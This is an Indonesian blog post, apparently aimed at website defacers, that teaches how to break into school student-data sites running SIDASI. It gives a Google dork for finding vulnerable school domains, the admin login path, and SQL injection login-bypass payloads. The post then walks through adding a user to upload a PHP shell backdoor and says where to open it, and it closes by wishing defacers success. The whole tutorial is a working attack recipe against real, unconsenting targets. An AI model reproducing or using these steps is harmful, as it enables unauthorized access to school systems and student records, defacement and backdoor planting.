Deface Metode Sistem Data Siswa (SIDASI) - Unauthenticated Bypass

Deface Metode Sistem Data Siswa (SIDASI) - Unauthenticated Bypass


Hay guys balik lagi ama mimin ganteng :D, kali ini mimin akan memberikan tutor deface lagi yaitu Metode Sistem Data Siswa (SIDASI) - Unauthenticated Bypass

Apakah bisa upload Shell? 
Tempat upload shell dimana bang? 
Index(homepage) Bisa ditebas bang? 
Abang ganteng gak? Iya dong jelas :v

Skuy 
Langsung Saja 

Bahan Bahan :
- Dork :
 - site:sidasi.* inurl:sch.id
( Kembangin Lagi saya Yakin Banyak Yg Vuln soalnya )

- Exploit/Admin Login : /?page=admin
- Shell Backdoor : Search Google 
- Payload :
Username : '=' 'or'
Password  : '=' 'or'
~~
Username : ' or 1=1 limit 1 -- -+
Password  : ' or 1=1 limit 1 -- -+


------------------------
Step By Step :
------------------------

1) Dorking dulu Menggunakan dork diatas. 


2) Lalu tempelkan exploit dibelakang site, example : site.sch.id/?page=admin
Otomatis nanti akan dibawa ke ADMIN LOGIN. 
masukkan payload, username & password.
Username : '=' 'or'
Password  : '=' 'or'
~~
Username : ' or 1=1 limit 1 -- -+
Password  : ' or 1=1 limit 1 -- -+

Lalu klik Login Jika vuln maka akan tertuju ke dashboard. Jika tidak tinggalin.


3) Jika Sudah Masuk Ke Dashboard klik SETTING USER Di sebelah tulisan GRAFIK, Sorry Kepotong :D


4) Sudah Klik SETTING USER? Kalian klik tambah Berwarna biru dibawah.


5) Jika Sudah Maka Tampilannya Akan Seperti dibawah:
isi data bebas, dan ada tulisan PILIH FILE, Disitu Kalian Upload Shell backdoor,Jika Data sudah dilengkapi, silahkan klik CHOOSE


6) Terakhir.. Manggil shell Backdoornya adalah : 
Site/assets/gambar/user/shellKalian.php



Jika Ke Shell Backdoor Ya tau lah mau ngapain bebas,Terserah Kalian. 

Oke Sekian Tutor Deface Dari saya, Mohon maaf jika ada kata" yg salah.
Semoga bermanfaat bagi kalangan defacer. 

Tampilkan Komentar
Sembunyikan Komentar

0 Response to "Deface Metode Sistem Data Siswa (SIDASI) - Unauthenticated Bypass"

Post a Comment

Note: Only a member of this blog may post a comment.

Your Information

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel